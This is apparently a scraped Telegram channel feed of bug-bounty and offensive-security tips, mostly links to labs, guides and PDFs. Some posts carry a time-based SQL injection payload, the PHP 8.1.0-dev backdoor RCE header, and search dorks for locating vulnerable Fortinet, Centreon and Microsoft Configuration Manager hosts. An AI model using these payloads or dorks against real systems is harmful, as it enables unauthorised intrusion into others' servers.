Brut Security
14.8K subscribers
927 photos
73 videos
287 files
982 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
πŸ”–2FA bugs setup/implementation, bypass and disable.

πŸ”— What is two-factor authentication?
🌐 Cloudflare
πŸ”— Multi-factor Authentication Labs:
🌐 Portswigger
πŸ”— 2FA/MFA/OTP Bypass:
🌐 Hacktricks
πŸ”— Testing 2 Factor Authentication:
πŸ“±Github
πŸ”— Account Takeover (2FA Bypasses):
πŸ“±Github
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯22❀4πŸ‘3
If you hate wasting time with 2FA, try this:

1. Install github.com/rsc/2fa on your computer/VPS & configure it with your 2FA sites.
2. Install Espanso, then add the config below.

Now, whenever you need an OTP, just type :otp and it’ll auto-fill. Easy and fast!

Credit- sw33tLie
❀14
HuntDB has been updated with:

- Full-text search for efficient exploration
- CVE-to-HackerOne mapping for enhanced vulnerability correlation
- More Data Points

--> : huntdb.com/hackerone
πŸ”₯10πŸ‘3
Time-Base SQL Injection

Payload: (select*from(select(sleep(15)))a)
#bugbountytips #BugBounty #sqli
πŸ‘27πŸ”₯9πŸ—Ώ2🀨1πŸ‘¨β€πŸ’»1
CyberSecurity RoadMAP.pdf
185.3 KB
Cybersecurity Roadmap
πŸ”₯21πŸ‘6❀2πŸ—Ώ2
Where is the Reactions? 😭😭😭
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯37πŸ—Ώ7🐳6❀4🫑3πŸ‘1
⚑️⚑️⚑️⚑️$300 in 5 mins - OTP Bypass - Bug Bounty POC - https://t.iss.one/brutsecurity_poc/21
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯7❀6🀝3πŸ‘2πŸ—Ώ1
🚫 CVE-2024-43468 : Microsoft Configuration Manager Remote Code Execution Vulnerability

πŸ”₯PoC:https://github.com/synacktiv/CVE-2024-43468

πŸ“ŒDorks
HUNTER :https://product.name="Microsoft Configuration Manager Remote Control service"

▢️Refer:https://securityonline.info/cve-2024-43468-cvss-9-8-microsoft-configuration-manager-exploit-revealed-with-poc-code/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43468

#Microsoft #infosec #infosecurity #OSINT #Vulnerability
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯7🀝3❀2πŸ—Ώ2πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ€·β€β™‚οΈπŸ€¦β€β™‚οΈ
🀝14πŸ—Ώ6😁2
Network_Security_VAPT_Checklist.pdf
151.6 KB
Network Security VAPT Checklist
πŸ”₯4❀3πŸ‘¨β€πŸ’»3🀝2πŸ—Ώ2πŸ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ”–CSP Bypass Tool

A website where you can search for known CSP bypass gadgets to exploit XSS.


πŸ‘€ Website: πŸ”—Link
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯15❀5πŸ‘4
πŸ”–Top 25 JavaScript path files used to store sensitive information in Web Application⬇️
πŸ”₯24❀2
πŸ‘5πŸ”₯3πŸ—Ώ3
zseanos-methodology.pdf
3.8 MB
BB Guide by Zseanos
🐳14❀1
Find Leaked Credentials Using Google Chrome dev Tools (The Best Way 😎)

https://github.com/h4x0r-dz/Leaked-Credentials
πŸ”₯32πŸ‘1
Your support is my energy! Every reaction inspires me to dig deeper, find exclusive tools, and craft the best resources just for you.β˜•οΈβ˜•οΈβ˜•οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯44πŸ‘7❀1
OSCEΒ³ and OSEE Study Guide

Checkout on GitHub
https://github.com/CyberSecurityUP/OSCE3-Complete-Guide
πŸ”₯17πŸ‘4❀3πŸ—Ώ3
If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

#bugbounty #bugbountytips #rce #sqli #cybersecurity
πŸ‘5❀2πŸ”₯1
CVE-2024-55573, -53923: SQLi in Centreon, 9.1 rating πŸ”₯

The vulnerabilities allow an attacker with high privileges to perform SQL injection into a form for uploading media.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/NETLB
πŸ‘‰ Dork: http.favicon.hash_sha256:795c0f8c1ff23b992d6ccb91df5e6488d4c259585da58b2e2f8eeee71147516a OR http.favicon.hash_sha256:c95e0dc8a2cc9a45d29c5381e62e48bde88f661408d4b811e72933fa7da32d4e

Vendor's advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2024-55573-centreon-web-critical-severity-4264
πŸ”₯6πŸ‘1🫑1
Fortinet FortiOS Authentication Bypass CVE-2024-55591

Query:
HUNTER:/product.name="Fortinet Firewall"
FOFA: product="FORTINET-Firewall"
SHODAN: instances running fortigate:
http.favicon.hash:945408572
ZoomEye Dork: app="Fortinet Firewall"

#BugBounty #CyberSecurity
πŸ‘9❀4πŸ”₯1